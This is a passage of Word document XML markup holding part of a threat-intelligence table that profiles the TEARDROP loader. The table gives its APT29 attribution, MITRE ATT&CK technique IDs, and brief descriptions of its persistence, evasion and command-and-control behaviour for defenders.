            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49058039" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7314EEE2" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>APT29, NOBELIUM, UNC2452</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="068B51EC" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50606FB5" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAA4E52" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="65A15847" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29D26BB4" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="087AAF3C" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1543.003</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Create or Modify System Process: Windows Service </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1140</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/Decode Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1036.005</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Masquerading: Match Legitimate Resource Name or Location </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1112</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Modify Registry </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1012</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Query Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="4DF3E71B" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79C48091" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="028546A5" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Executes through malicious Windows services, memory-resident payload execution, XOR-decoded shellcode, and customized Cobalt Strike payload delivery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="4280749E" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F5D55F" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120770D6" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Creates malicious Windows services and modifies registry keys for service persistence. Often stored in trusted Windows directories such as C:\Windows\SysWOW64\.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="2108C413" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5506B80D" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DCF9EB7" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No direct privilege escalation functionality publicly documented; relies on previously obtained elevated privileges during intrusion operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="370DF97B" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6856CE76" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="653B8298" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Uses masquerading, XOR obfuscation, fake JPG headers, in-memory execution, and registry/environment validation checks to evade detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="38FA6D38" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E28AB9E" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="694C8E42" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No native credential theft capability documented; supports deployment of tools such as Cobalt Strike that may perform credential dumping.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="43DD5B6C" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A3CBEC1" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076EE1E9" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Performs limited registry-based environment checks before execution, including querying HKU\SOFTWARE\Microsoft\CTF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="346E7C05" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E09056B" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B21A2C6" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>TEARDROP itself is not a lateral movement tool but facilitates deployment of Cobalt Strike payloads capable of remote execution and pivoting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="1DE81EE5" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D98897C" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDF2055" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Primarily acts as a loader for Cobalt Strike beacons which establish external command-and-control communication channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="77526CC9" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF5EBA4" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315DD21D" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No direct exfiltration capability documented; exfiltration likely handled by secondary payloads or follow-on malware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="71193F0A" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30245B73" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD50B23" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
